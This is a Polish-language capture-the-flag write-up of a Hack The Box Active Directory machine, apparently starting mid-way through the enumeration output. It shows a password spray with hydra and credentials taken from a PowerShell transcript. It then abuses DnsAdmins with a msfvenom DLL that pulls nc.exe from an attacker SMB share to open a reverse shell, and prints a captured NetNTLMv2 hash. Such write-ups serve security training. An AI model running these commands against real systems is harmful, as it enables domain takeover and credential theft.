index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo	Name: (null)	Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus	Name: (null)	Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko	Name: Marko Novak	Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie	Name: (null)	Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki	Name: (null)	Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo	Name: (null)	Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per	Name: (null)	Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan	Name: Ryan Bertrand	Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally	Name: (null)	Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon	Name: (null)	Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve	Name: (null)	Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie	Name: (null)	Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita	Name: (null)	Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf	Name: (null)	Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach	Name: (null)	Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

 ========================================= 
|    Share Enumeration on 10.10.10.169    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.169

 ==================================================== 
|    Password Policy Information for 10.10.10.169    |
 ==================================================== 
[+] Trying protocol 445/SMB...

	[!] Protocol failed: Missing required parameter 'digestmod'.

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7


 ============================== 
|    Groups on 10.10.10.169    |
 ============================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Contractors] rid:[0x44f]

[+] Getting domain group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\marko
Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita
Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail
Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus
Group 'Domain Users' (RID: 513) has member: MEGABANK\sally
Group 'Domain Users' (RID: 513) has member: MEGABANK\fred
Group 'Domain Users' (RID: 513) has member: MEGABANK\angela
Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia
Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo
Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf
Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie
Group 'Domain Users' (RID: 513) has member: MEGABANK\claire
Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo
Group 'Domain Users' (RID: 513) has member: MEGABANK\steve
Group 'Domain Users' (RID: 513) has member: MEGABANK\annette
Group 'Domain Users' (RID: 513) has member: MEGABANK\annika
Group 'Domain Users' (RID: 513) has member: MEGABANK\per
Group 'Domain Users' (RID: 513) has member: MEGABANK\claude
Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie
Group 'Domain Users' (RID: 513) has member: MEGABANK\zach
Group 'Domain Users' (RID: 513) has member: MEGABANK\simon
Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator

Dużo informacji o użytkownikach oraz grupach, które mogą się przydać… warto zrobić plik z nazwami użytkowników na później.
Następnie sprawdzamy każdego użytkownika przez RPC

rpcclient $> queryuser marko

	User Name   :	marko
	Full Name   :	Marko Novak
	Home Drive  :	
	Dir Drive   :	
	Profile Path:	
	Logon Script:	
	Description :	Account created. Password set to Welcome123!
	Workstations:	
	Comment     :	
	Remote Dial :
	Logon Time               :	czw, 01 sty 1970 01:00:00 BST
	Logoff Time              :	czw, 01 sty 1970 01:00:00 BST
	Kickoff Time             :	czw, 14 wrz 30828 03:48:05 BST
	Password last set Time   :	pią, 27 wrz 2019 14:17:15 BST
	Password can change Time :	sob, 28 wrz 2019 14:17:15 BST
	Password must change Time:	czw, 14 wrz 30828 03:48:05 BST
	unknown_2[0..31]...
	user_rid :	0x457
	group_rid:	0x201
	acb_info :	0x00000210
	fields_present:	0x00ffffff
	logon_divs:	168
	bad_password_count:	0x00000000
	logon_count:	0x00000000
	padding1[0..7]...
	logon_hrs[0..21]...

znajdujemy default’owe hasło ale nie stety nie działa na użytkownika marko
więc puszczamy hydrę na pozostałych użytkowników

hydra -L users.txt -p Welcome123! 10.10.10.169 smb

[445][smb] host: 10.10.10.169   login: melanie   password: Welcome123!
smbclient -L \\\\10.10.10.169  -U melanie%Welcome123!

WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Jedynie pliki do przejrzenia są w SYSVOL ale nic nie znalazłem ciekawego.
Następnie próbujemy się zalogować przez winRM

evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123!
cat user.txt
0c3be45fcfe***bee8d3a978540

ROOT

    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        9/27/2019   7:05 AM                ryan

Jest jeszcze użytkownik ryan możliwe że trzeba będzie się na niego przerzucić żeby dojść do Administratora.
Coś jest nie tak bo nie mogę wrzucić żadnego pliku..
Na pierwszy rzut oka nie widać nic ciekawego ale zwykłe listowanie nie pokazuje nam plików i folderów ukrytych

Get-ChildItem -Attributes D+H

    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
C:\PSTranscripts> Get-ChildItem -Attributes D+H


    Directory: C:\PSTranscripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203
C:\PSTranscripts\20191203> Get-ChildItem -hidden


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
	*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************

Wygląda na jakiś plik z logami jak ktoś podpinał powershellem dysk sieciowy i jawnie hasło jest podane napewno się przyda

evil-winrm.rb -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!

Znajdujemy plik z info i enumerujemy dalej

C:\Users\ryan\Desktop> cat note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

Po enumeracji widzimy, że jesteśmy w grupie DnsAdmins

*Evil-WinRM* PS C:\Users\ryan> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Google podpowiada, że można to wykorzystać do eskalacji uprawnień

https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html

potrzebujemy plik dll który wykona naszą komendę, więc generujemy go venomem

msfvenom -p windows/x64/exec CMD='\\10.10.14.169\smb\nc.exe 10.10.14.169 9091 -e cmd.exe' -f dll > rev.dll

Następnie włączamy server smb i zmuszamy ofiarę żeby ściągnęła nc.exe i uruchomiła reversa przez nasze dll.
Poniżej zamieszone są 3 listingi każdy z innej konsoli

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe resolute /config /serverlevelplugindll \\10.10.14.169\smb\rev.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns
smbserver.py smb ./
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,57896)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:9f316583276dd429b4e015b7c066689c:010100000000000000902b84f72cd60178f2def3a272144c000000000100100049006d0075005500630061004f0058000300100049006d0075005500630061004f0058000200100055004d0065006f006b005500480058000400100055004d0065006f006b005500480058000700080000902b84f72cd60106000400020000000800300030000000000000000000000000400000f8414b77bdfa03474cc0614f196e05749bfdf6c1db3da0d9075a699c925a719e0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100360039000000000000000000
[*] Disconnecting Share(1:IPC$)
[-] Unknown level for query path info! 0x109
[-] Unknown level for query path info! 0x4
[-] Unknown level for query path info! 0x109
[-] Unknown level for query path info! 0x4
[-] Unknown level for query path info! 0x109
[-] Unknown level for query path info! 0x4
nc -lvp 9091
listening on [any] 9091 ...
10.10.10.169: inverse host lookup failed: Unknown host
connect to [10.10.14.169] from (UNKNOWN) [10.10.10.169] 57897
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.


C:\Windows\system32>whoami 
nt authority\system


C:\Users\Administrator\Desktop>type root.txt
e1d94876a50***edb5405e619c

Leave a Comment